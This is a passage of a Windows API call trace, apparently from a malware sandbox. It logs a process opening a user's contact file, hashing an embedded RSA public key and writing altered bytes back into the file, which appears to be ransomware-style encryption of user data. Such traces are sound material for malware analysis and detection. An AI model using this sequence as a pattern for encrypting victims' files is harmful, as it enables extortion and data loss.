0x31b5968 [0230.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0230.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0230.969] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned=".contact" [0230.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0230.985] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=1177) returned 1 [0230.985] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0230.988] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x473, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0230.988] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0230.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0230.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0230.990] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.990] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x499, lpOverlapped=0x0) returned 1 [0230.990] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0230.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0230.991] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0230.991] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0230.991] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0230.992] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0230.992] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0230.992] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0230.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0230.992] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0230.992] GetLastError () returned 0x0 [0230.992] SetLastError (dwErrCode=0x0) [0230.992] GetLastError () returned 0x0 [0230.992] SetLastError (dwErrCode=0x0) [0230.992] GetLastError () returned 0x0 [0230.992] SetLastError (dwErrCode=0x0) [0230.992] GetLastError () returned 0x0 [0230.992] SetLastError (dwErrCode=0x0) [0230.992] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.993] SetLastError (dwErrCode=0x0) [0230.993] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0230.994] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] GetLastError () returned 0x0 [0230.994] SetLastError (dwErrCode=0x0) [0230.994] GetLastError () returned 0x0 [0230.995] SetLastError (dwErrCode=0x0) [0230.995] GetLastError () returned 0x0 [0230.995] SetLastError (dwErrCode=0x0) [0230.995] GetLastError () returned 0x0 [0230.995] SetLastError (dwErrCode=0x0) [0230.995] GetLastError () returned 0x0 [0230.995] SetLastError (dwErrCode=0x0) [0230.995] GetLastError () returned 0x0 [0230.995] SetLastError (dwErrCode=0x0) [0230.995] GetLastError () returned 0x0 [0230.995] SetLastError (dwErrCode=0x0) [0230.995] GetLastError () returned 0x0 [0230.995] SetLastError (dwErrCode=0x0) [0230.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0230.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0230.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0230.995] CryptDestroyHash (hHash=0x31de170) returned 1 [0230.995] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0230.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0230.995] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0230.995] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0230.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0230.995] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0230.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4a0) returned 0x325fb40 [0230.996] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0230.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d6d0 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b74a8 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc20 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b74f0 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc38 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbf0 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcb0 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd10 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x65dd10 [0230.996] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325d8d8 [0230.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b1b70 [0230.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbf0 | out: hHeap=0x630000) returned 1 [0230.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0230.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0230.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0230.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcb0 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edd10 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edbf0 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0230.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0230.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0230.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0230.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0230.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbf0 | out: hHeap=0x630000) returned 1 [0230.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0230.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0230.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0230.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0230.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0230.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8d8 | out: hHeap=0x630000) returned 1 [0230.998] GetCurrentThreadId () returned 0x314 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696dd8 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.998] GetCurrentThreadId () returned 0x314 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0230.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0230.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcb0 [0230.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbf0 [0230.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0230.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd10 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc80 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcc8 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc68 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edce0 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc68 | out: hHeap=0x630000) returned 1 [0231.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edc68 [0231.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbf0 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbf0 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325d8d8 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edce0 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325dae8 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbf0 | out: hHeap=0x630000) returned 1 [0231.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b1b70 [0231.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0231.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dae8 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc68 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc80 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0231.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc38 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b74f0 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8d8 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.003] WriteFile (in: hFile=0x640, lpBuffer=0x325fb40*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x325fb40*, lpNumberOfBytesWritten=0x3adfb14*=0x494, lpOverlapped=0x0) returned 1 [0231.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.003] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x499, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 